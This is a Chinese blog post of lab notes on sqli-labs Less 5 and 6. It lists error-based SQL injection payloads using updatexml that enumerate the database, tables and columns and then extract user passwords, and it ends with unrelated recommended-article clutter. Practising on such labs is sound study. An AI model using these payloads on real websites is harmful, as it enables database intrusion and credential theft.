spli-lab-less5,6

最新推荐文章于 2024-06-02 14:44:28 发布
最新推荐文章于 2024-06-02 14:44:28 发布
阅读量777 收藏 22
点赞数 12
分类专栏: spli-lab 文章标签: mybatis sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63613326/article/details/136132274
版权

第五关

先判断注入方式

输入URL/?id=1'    异常,如果去掉1'发现前后引号完全闭合,所以这应该就是注入方式

这里使用的是报错注入

?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+

?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'),0x7e),1) --+

他说子查询返回1行以上,所以我们需要加点东西

改成这样的

?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1) --+

limit 0,1    第一个

limit 1,1    第二个

limit 2,1    第三个

limit 3,1    第四个

?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users'limit 0,1),0x7e),1) --+

?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users'limit 1,1),0x7e),1) --+     这里只改了limit 1,1

?id=1' and updatexml(1,concat(0x7e,(select id from users limit 0,1),0x7e),1) --+

?id=1' and updatexml(1,concat(0x7e,(select id from users limit 0,1),0x7e),1) --+

?id=1' and updatexml(1,concat(0x7e,(select username from users limit 0,1),0x7e),1) --+

?id=1' and updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1) --+

第六关

注入方式不同,其他同第五关


ID:1"
ID:1" and 1=2-- 
ID:1" and 1=2-- 
ID:1" and 1=1-- 
ID:1" and 1=1-- 
ID:1" and 1=2-- 
ID:1" and 1=2 -- 
ID:1" and update(1,concat(0x7e,(select database()),0x7e),1) -- 
ID:1" and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- 
ID:1" and updatexml(1,concat(0x7e,(select table_name from information schema.tables where table_name = 'security'),0x7e),1) -- 
ID:1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_name = 'security'),0x7e),1) -- 
ID:1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = 'security'),0x7e),1) -- 
ID:1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = 'security' limit 0,1),0x7e),1) -- 
ID:1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = 'security' limit 1,1),0x7e),1) -- 
ID:1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = 'security' limit 2,1),0x7e),1) -- 
ID:1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = 'security' limit 3,1),0x7e),1) -- 
ID:1" and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name = 'users' limit 3,1),0x7e),1) -- 
ID:1" and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name = 'users' limit 0,1),0x7e),1) -- 
ID:1" and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name = 'users' limit 1,1),0x7e),1) -- 
ID:1" and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name = 'users' limit 2,1),0x7e),1) -- 
ID:1" and updatexml(1,concat(0x7e,(select password from users limit 2,1),0x7e),1) -- 
ID:1" and updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1) -- 
ID:1" and updatexml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1) -- 
 

羡鱼饼饼
关注
  • 12
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
B样条插值(B-spline interpolation)
04-12
该文档讲述了B样条插值在图像处理中的应用,内容翔实,可供参考。
defold-splitmix64:用于Defold的SplitMix64 PRNG
02-16
用于折叠的SplitMix64 PRNG 此扩展将SplitMix64包装在游戏引擎的简单Lua API中。 SplitMix64算法来自 ,它是通过BigCrush的非常快速的生成器。 Splitmix64是Java中默认的伪随机数生成器算法,并且在许多其他语言中都包含/提供了Splitmix64。 它使用了一种相当简单的算法,尽管出于加密目的它被认为很差,但计算速度非常快,并且对于许多随机数需求来说“足够好” 。 它通过了一些相当严格的PRNG“适应性”测试,以至于某些更复杂的算法失败了。 安装 通过将此项目添加为可以在自己的项目中使用它。 打开您的game.project文件,并在项目下的依赖项字段中添加: 或指向的ZIP文件。 用法 splitmix64.randomseed(x) 将x设置为伪随机数生成器的“种子”:相等的种子产生相等的数字序列。 参数 x号。 spli
Medium Code Highlighter-crx插件
04-01
语言:English 在中型文章中添加代码语法突出显示 chrome浏览器扩展程序,可在“中型”文章中添加突出显示语法的代码。 不要在没有嵌入要点或代码图像的文章中忘记代码上的黑色斑点! -在“ ' blocks in Medium articles.- Highlighting theme is selectable and can be changed on-the-fly (via extension popup upon icon-click) from a handful of popular themes. -- Theme preference links to Chrome account.- Works on all Medium articles, regardless of domain (i.e. 'medium.com', 'medium.freecodecamp.org', 'hackingandslacking.com', etc.)*Note*Due to Medium's innate formatting, code blocks are spli
B-spline-approximation.rar_B-spline_Spline opencv_opencv spli_
09-24
一个可以将给定2D曲线图像转化为B样条曲线的程序。需要opencv支持 内含程序源码、用户手册、算法原理文档、样例以及结果文档
Split-beam-method-estimated-target-.rar_LFM 波束_Split-beam_spli
07-13
分裂波束法估计目标方向 ULA(均匀线列阵),16个阵元,LFM信号的中心频率为25KHz,带宽为1KHz,信号时宽为150ms。求来波方向的估计值 。
SQLi LABS Less-18
热门推荐
wangyuxiang946的博客
06-22 1万+
第十八关请求方式为 GET请求 , 注入点为User-Agent , 注入方式为 错误注入 第一步,判断注入方式 先看源码 后台代码对 特殊字符进行了过滤 , 常规的注入方式行不通 , 只有通过代码审计来判断注入方式 登录成功后 , 有一个保存用户主机信息的SQL语句 , 并且没有对参数进行过滤 , 我们可以针对这个SQL进行错误注入 真实场景中 , 我们可以先注册一个账号进行登录 , 登录成功后通过User-Agent 进行错误注入 , 从而实现脱库 使用 Burp...
Sql-labs靶场(1~28)
xhx836161547的博客
12-29 4740
sql注入经典靶场Sql-labs全关详解,正在加急更新中
Sqli-labs 查看源代码 1-20
foolisheddy
03-08 4383
Less-1 indexphp sqli-connectphp db-credsinc GET - 基于错误 - 单引号 - 字符型 Less-2 GET - 基于错误 - 整型 Less-3 基于错误 - 单引号变形 - 字符型 Less-4 基于错误 -双引号- 字符型 Less-5 Less-6 双注入-双引号-字符型 Less-7 单引号 双括号 非基于错误 Less-8 基于布尔 - 单引
学习spli-lab,记录学习。
liuniliu的博客
02-16 436
1
PostgreSQL的视图pg_class
最新发布
lee_vincent1的博客
06-02 1041
在 PostgreSQL 中,pg_class是一个系统目录表,用于存储所有关系(如表、索引、视图、序列等)的元数据。pg_class是数据库系统的重要组成部分,包含了关于每个关系的具体信息。pg_class。
基础—SQL—DQL(数据查询语言)聚合函数
m0_74363339的博客
05-30 576
这篇博客主要讲到了SQL分类中的DQL(数据查询语言)—聚合函数的讲解,聚合函数比较简单,但它主要配合着分组查询进行数据查询的操作,注意NULL的字段值不参与聚合函数的运算......
PostgreSQL常用插件
PGCCC的博客
05-29 652
1.提供 PostgreSQL 实例的操作系统级别的资源使用情况,包括缓存命中率和磁盘 IO 等。通过使用这些插件,您可以大大增强 PostgreSQL 的功能,满足各种复杂的应用需求。1.提供三元组(trigram)相似度匹配和索引功能,常用于模糊搜索和文本相似度匹配。1.增加对地理空间数据的支持,使 PostgreSQL 成为一个功能强大的空间数据库。1.PostgreSQL 的过程语言,允许用户编写存储过程和触发器。1.基于逻辑复制的插件,提供更细粒度的数据复制控制和双向复制能力。
Java事务入门:从基础概念到初步实践
Huazie
05-29 1127
本文 Huazie 从 Java 事物的基础概念出发,带大家通过不同的事物管理方式进行实践,进一步加深了对 Java 事物的理解。
家庭理财管理系统(含源码+sql+视频导入教程+文档)
stopTheworld2022的博客
05-30 863
家庭理财管理系统拥有两种角色: 管理员:财务管理、财务类型管理、财务计划管理、家庭财务报表、用户管理、支出排行等 家庭成员:添加个人财务计划、查看家庭支出收入等信息
掌握 NestJS 10.x:NestJS 结合 PostgreSQL 使用详解
_midnight的博客
05-31 472
本文详细介绍了如何在 NestJS 项目中集成和使用 PostgreSQL 数据库。涵盖了安装依赖、配置 TypeORM、创建实体、定义服务和控制器以及运行应用的步骤。通过清晰的步骤和示例,帮助开发者快速上手并构建高效的全栈应用。
sql server2022安装教程
没有黑科技
05-29 912
1. 引言 - 1.1 版本介绍 - 1.2 本教程目标 2. 系统要求 - 2.1 操作系统要求 - 2.2 硬件要求 - 2.3 软件要求 3. 下载SQL Server 2022 - 3.1 访问官方下载页面 - 3.2 选择版本 - 3.3 下载步骤 4. 安装前的准备 - 4.1 检查更新 - 4.2 备份现有数据 - 4.3 确保足够的权限 5. 开始安装 - 5.1 启动安装程序 - 5.2 选择安装类型 -
Spark SQL数据源 - Hive表
IT深耕十余载,大道之简
06-01 734
Spark SQL对Hive的支持非常强大,可以直接读取和写入Hive表中的数据。Hive是一个基于Hadoop的数据仓库,它提供了SQL接口来查询和管理存储在HDFS或其他Hadoop兼容存储系统中的数据。
SQL—DQL之执行顺序(基础)
m0_74363339的博客
05-31 404
这篇博客是SQL分类中DQL(数据查询语言)的基础语法块的最后的内容,主要讲到了DQL语句在执行的时候的编写顺序和执行顺序......
Mysql学习
2301_79390585的博客
05-30 1095
单个字段:select 字段名 from 表名;多个字段:select 字段名,字段名 from 表名;搜索多个字段时,字段名之间使用逗号隔开所有字段:select * from 表名;搜索所有字段时使用 '*' 替代字段名搜索不同的行:select distinct 字段名 from 表名;distinct关键字必须放在所有的字段名之前,不能放在部分的字段名之前;限定返回结果的行数:select 字段名 from 表名 limit 行数;
train_test_spli函数
04-02
train_test_split函数是一个常用的机器学习工具,用于将数据集划分为训练集和测试集。它的作用是帮助我们评估模型的性能和泛化能力。 train_test_split函数的使用方法如下: ``` from sklearn.model_selection ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值